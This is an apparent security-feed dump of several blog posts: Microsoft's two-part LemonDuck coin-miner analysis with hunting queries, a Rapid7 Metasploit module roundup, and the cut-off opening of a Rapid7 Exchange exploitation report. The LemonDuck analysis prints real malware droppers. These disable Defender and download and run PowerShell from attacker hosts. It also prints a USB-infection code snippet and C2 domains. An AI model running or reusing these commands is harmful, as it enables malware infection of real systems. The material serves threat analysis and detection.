center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-26T18:52:42", "description": "## ProxyLogon\n\n\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allwoing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010)\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the "/Config/SaveUploadedHotspotLogoFile" upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. The `-s` flag allows one to search by rank, disclosure date, module name, module type, or if the module implements a check method or not. The results will be ordered in ascending order, however users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex:Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation of Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages are more understandable.\n\n * [#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * [#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-26T17:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "modified": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina 